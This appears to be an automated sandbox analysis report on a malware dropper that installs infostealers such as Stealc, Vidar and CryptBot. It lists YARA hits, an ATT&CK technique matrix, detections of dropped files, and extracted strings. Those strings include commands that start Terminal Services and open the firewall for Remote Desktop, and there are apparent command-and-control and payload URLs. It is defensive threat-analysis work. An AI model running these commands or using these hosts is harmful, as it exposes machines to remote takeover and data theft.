Source: Yara match	File source: 17.2.stealc_default2.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2162755046.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.1886878201.000000000078E000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.1886855224.0000000000771000.00000080.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 4092, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe, type: DROPPED

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: stealc_default2.exe PID: 4092, type: MEMORYSTR

Contains functionality to start a terminal service

Source: f55899dae2.exe, 00000021.00000002.2615212451.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: f55899dae2.exe, 00000021.00000002.2615212451.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set9808a67f01d2f0720518035acbde7521c1ec479e5342a25940592acf24703eb27c43933a6df6cc301ccfdb96c295ca9e1379cdKQ6YLeECCI7oRIIlBdu0JXCschRUJvTmfL1bOR7r2ybwLPTtMr==SvPibCQyHPQpdL==JPKpdL==XgagNuVoBJ1TRp==WZYvZSx5AcYV4F==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyPWW XN==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy VSJq29EKfvRj1wrD1Urk1YMDS0GeciN62q==SjKqWZQhIx5IxvMEWthJxwZwAVygSXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyakKrZBtxBpL8SEysZYFm1NP=SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy UXdq1wz8Wb5jOALv2o==HSKQRQFVJabxXJtwyK==VButcv==SBYQVv==PXKR9TF3bkB3aZF3 0B3Wj 3WUx3aDB3bTT3XDP3WUN3 EN3 Z23agP=W0yiZx1p1wAZ3Rtg2wVh1yr8W0yiZx1p1wz=WZmmcx1p1wz=XAt=XQt=XQx=XQB=RTumbb==9EGXcykAAm==9EGXcCIaAoa=XU7iXDmpWZQhaEBu UCmcjatJ0uYaRR5NDB+NDF+JYqpdR u1dPmIvhoGt==dx==HkKraSMdNN==aZ7ibBsEB98bgvs=9ZKvbhRxBpLl4vtjPZKXThB50N2cZShq3ALqHOZmdx==SEysZYFm1KU9ivB4OSOyUWMlJSbdiw 92gK=OUOmchA=QZuwcBRD2SwWNtt9Na==PSCCVv==SDurZBAlJSYaiMFg3Ba=PDYgdB5Dxvgc36==OSOEKwNtVB55NMAK4LJS2gbX4I==OjaXZBRrOM8b4ME=RjYvdB5zSZYtaB5EOZYqbXNATZarRBRrOM8b4ME=KAtvMuM6C fVTF==ajx=bZx=OZYrdBRz3s4LjMxcDcrq3Or0cYEl9hHlXjYvbNXpNNU9Tnx 1XLrOyzygU3xHMRjJPPqLNWyBNeAbX15OM8RQJNg2Xrs2Uf0cXbyKcsc 0yqLRNm3wHYNv191QK6xeLhfHHmKssc9TmibhByOJ3 GdPHQX5z3wYlirXL4RriDavheIEw7QE8bDasbd5ANTUcirXq3BziNOUNEh3OBNdqLNWyAI3=JPPKCb==N0CgceWCJjetZr==OZYrdBRz3s4LjMxcDcre2zvscXQl Acl fY1LS 83o4dgSFkARLv1yPu03boVQH=SYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA4VR5k2BLXOPDO0X4pTyEl UqYdBRDIcIk4F==OZYqcCR5ONMF3LXcWTygZBRrOSkgfbpj1QVs2zzye4U5 h5UcUdtMOEECtXTSocWAPY=JUKraRJAOwXkSYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA40L1g3ALhKefk1XbgMU0ETCyMTAt1HKUwYQs=SYaQVzRSMuQmgcNp1WnQOPKwOEIgQWMobjagZSJhFcIqfLJv0RDt1yz5ZG2tVAMlTjahZR5OGq==VAptMyw=PDKjYSRx3vQciwNg1g4wAdbS1YQz8BMQ9TYrPDKjYSRx3vQciwNg1g4wAdfS1YQz8BMQ9TYrSXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0BdTgNhFTYphbRl3zPi2fHpd37=SEysZCRo3u89gLQ=KgpuOL==KgpvMb==KgpuNb==KgpvNL==O0KvchRz3uMSfLtbVx==Mgd3akKrZBtxBpLl4MdcJZhdGkGecXpw0MAjNr5dxwZm1KuiGfpjJdx50M4cgSRRxxudyaSg1HYwEu==HfNdRSdu3sL=GfpjJdxDOM78GzNjIv==SDY0ZSFE0wYjgr1c4AK=JTK1ZRJ63womgcxm1Abg4Kvy1X4z AMp9T3rZRMlAK2ggvQ8xa==Gd==aZ7YdBNA3S78QMI8ARGdBs==a0F6cr==ajurZB5yQZK2Yh5m2cT8YvBW1XLXMxvy1XAzUQH=KAptMyw5BJn=KAptMyw5B L=KAptMyw5B P=KAptMyw5BS1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C960C40 sqlite3_bind_zeroblob,	17_2_6C960C40
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C960D60 sqlite3_bind_parameter_name,	17_2_6C960D60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C888EA0 sqlite3_clear_bindings,	17_2_6C888EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C960B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	17_2_6C960B40
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C886410 bind,WSAGetLastError,	17_2_6C886410
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8860B0 listen,WSAGetLastError,	17_2_6C8860B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C88C030 sqlite3_bind_parameter_count,	17_2_6C88C030
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C88C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	17_2_6C88C050
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C886070 PR_Listen,	17_2_6C886070
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8122D0 sqlite3_bind_blob,	17_2_6C8122D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8863C0 PR_Bind,	17_2_6C8863C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	21 Windows Management Instrumentation	111 Scripting	1 DLL Side-Loading	111 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	1 Remote Desktop Protocol	12 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Windows Service	111 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Windows Service	412 Process Injection	4 Obfuscated Files or Information	Security Account Manager	13 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	11 Scheduled Task/Job	23 Software Packing	NTDS	469 System Information Discovery	Distributed Component Object Model	Input Capture	1 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	121 Registry Run Keys / Startup Folder	121 Registry Run Keys / Startup Folder	1 Timestomp	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	991 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Masquerading	DCSync	471 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	471 Virtualization/Sandbox Evasion	Proc Filesystem	14 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 Remote System Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	50%	ReversingLabs	Win32.Packed.Themida
file.exe	47%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\new_v8[1].exe	100%	Avira	HEUR/AGEN.1313486
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	100%	Avira	TR/AD.Stealc.cucnc
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe	100%	Avira	TR/AD.Stealc.cucnc
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\RDX123456[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\new_v8[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	100%	Joe Sandbox ML
C:\ProgramData\LgAmARwZ\Application.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\GOLD1234[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\shop[1].exe	100%	Joe Sandbox ML
C:\ProgramData\LgAmARwZ\Application.exe	50%	ReversingLabs	Win32.Trojan.Generic
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	5%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\new_v8[1].exe	79%	ReversingLabs	Win32.Adware.RedCap
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	39%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\RDX123456[1].exe	75%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	50%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe	76%	ReversingLabs	Win32.Trojan.Stealerc
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	39%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\splwow64[1].exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Offnewhere[1].exe	32%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\shop[1].exe	53%	ReversingLabs	Win32.Packed.Generic
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	76%	ReversingLabs	Win32.Trojan.Stealerc
C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	32%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	79%	ReversingLabs	Win32.Adware.RedCap
C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	50%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe	75%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	53%	ReversingLabs	Win32.Packed.Generic
C:\Users\user\AppData\Local\Temp\1001471001\c8908bf20d.exe	39%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1001472001\2dc588f7b5.exe	39%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	50%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\5C4X2NVYNV2E9BIIRWD89LJFJIM.exe	37%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label	Link
http://anglebug.com/4633	0%	URL Reputation	safe
https://anglebug.com/7382	0%	URL Reputation	safe
https://www.gstatic.cn/recaptcha/	0%	URL Reputation	safe
http://anglebug.com/6929	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	0%	URL Reputation	safe
https://anglebug.com/7246	0%	URL Reputation	safe
https://anglebug.com/7369	0%	URL Reputation	safe
https://anglebug.com/7489	0%	URL Reputation	safe
https://issuetracker.google.com/161903006	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://lv.queniujq.cn	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	URL Reputation	safe
http://anglebug.com/4722	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	0%	URL Reputation	safe
https://checkout.steampowered.com/	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	URL Reputation	safe
http://anglebug.com/3502	0%	URL Reputation	safe
http://anglebug.com/3623	0%	URL Reputation	safe
http://anglebug.com/3625	0%	URL Reputation	safe
http://anglebug.com/3624	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
http://anglebug.com/3862	0%	URL Reputation	safe
http://anglebug.com/4836	0%	URL Reputation	safe
https://issuetracker.google.com/issues/166475273	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
http://anglebug.com/3970	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.all	0%	URL Reputation	safe
http://anglebug.com/5901	0%	URL Reputation	safe
http://anglebug.com/3965	0%	URL Reputation	safe
https://anglebug.com/7161	0%	URL Reputation	safe
https://anglebug.com/7162	0%	URL Reputation	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.	0%	URL Reputation	safe
http://anglebug.com/5906	0%	URL Reputation	safe
http://anglebug.com/2517	0%	URL Reputation	safe
http://anglebug.com/4937	0%	URL Reputation	safe
https://issuetracker.google.com/166809097	0%	URL Reputation	safe
http://anglebug.com/3832	0%	URL Reputation	safe
https://api.steampowered.com/	0%	URL Reputation	safe
https://store.steampowered.com/mobile	0%	URL Reputation	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli	0%	Virustotal		Browse
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV	0%	Virustotal		Browse
https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&l=	0%	Virustotal		Browse
http://185.215.113.17/2fb6c2cc8dce150a.phpro	19%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
opposezmny.site	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.17/2fb6c2cc8dce150a.phpro	stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp	false	19%, Virustotal, Browse	unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV	new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://anglebug.com/4633	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://anglebug.com/7382	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.gstatic.cn/recaptcha/	new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&l=	new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli	new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://185.215.113.16/luma/random.exe2q	axplong.exe, 0000000D.00000002.3755340826.00000000013AF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/Jo89Ku7d/index.phpoft	axplong.exe, 0000000D.00000002.3755340826.00000000013AF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://anglebug.com/6929	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sosipisos.cc/shop.exezKU	axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowere&	new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	stealc_default2.exe, 00000011.00000003.2103880354.000000002D5AA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncoded	axplong.exe, 0000000D.00000002.3764499174.0000000006190000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.autoitscript.com/autoit3/J	splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000000.2135901294.0000000000349000.00000002.00000001.01000000.00000010.sdmp, EcoCraft.scr, 00000029.00000002.3749890554.00000000006A9000.00000002.00000001.01000000.00000017.sdmp, EcoCraft.scr, 0000002F.00000002.2543717342.00000000006A9000.00000002.00000001.01000000.00000017.sdmp	false		unknown
https://steamcommunity.com/profiles/76561199724331900	new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B51000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://anglebug.com/7246	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://anglebug.com/7369	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&	new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://anglebug.com/7489	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/216e50adc2dd0a1bfe522b3effbbd4e64e3aa636b77#	axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.ver)	svchost.exe, 00000023.00000002.3755487168.0000029987EBF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://issuetracker.google.com/161903006	chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
